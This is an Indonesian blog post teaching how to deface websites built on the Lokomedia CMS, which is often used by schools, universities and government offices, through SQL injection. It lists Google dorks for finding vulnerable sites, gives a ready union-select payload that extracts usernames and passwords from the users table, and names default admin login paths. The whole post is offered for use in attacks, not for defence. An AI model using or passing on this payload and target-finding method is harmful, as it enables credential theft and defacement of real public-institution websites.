Cara Deface SQL Injection Lokomedia | Pro 109 Links

/* No Script */ body,html{overflow:hidden} .noscript{background:#1277cb;color:#fff;padding:8% 0 0 0;position:fixed;bottom:0;left:0;top:0;right:0;z-index:1000;height:auto;-webkit-transform:translateZ(0);transform:translateZ(0);overflow:hidden} .noscript p{margin:0;text-align:center;padding:0 20px 10px 20px;margin:auto;font-size:3rem;line-height:1.5;font-family:monospace;max-width:970px;text-transform:uppercase;font-weight:700} .noscript p span{color:#ffe88b;font-size:10rem;line-height:normal;font-weight:normal}

Home » Internet » Cara Deface SQL Injection Lokomedia

Jumat, 05 April 2019

Cara Deface SQL Injection Lokomedia

Published by : Bakda Adriansyah Internet

Lokomedia ialah sebuah cms karya anak bangsa yang sering digunakan untuk situs website sekolah, universitas, pemerintah dan apapun itu. Ya memang seharusnya ini paling didukung dan diapresiasi, tapi sebab bugnya yang fatal cms ini tidak jarang kali jadi sasaran.

Bug pada cms ini ialah sql injection. Jika belum paham tentang sql injection kalian biasa menyimak artikelnya disini. Kalo udah yaudah lanjut.

Dork:
inurl:/statis-1-profil.html
inurl:/statis-3-strukturorganisasi.html
inurl:/statis-1-visimisi.html
inurl:/statis-1-tujuan.html

Kembangin lagi gan.

Exploit:
‘union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)–+

Default admin login:
/admin
/adminweb
/administrator
/redaktur

Selengkapnya baca di SQL Injection Lokomedia.

Load comments

Langganan: Posting Komentar ( Atom )

Pro 109 Links

Jumat, 05 April 2019

Cara Deface SQL Injection Lokomedia

Get notify via email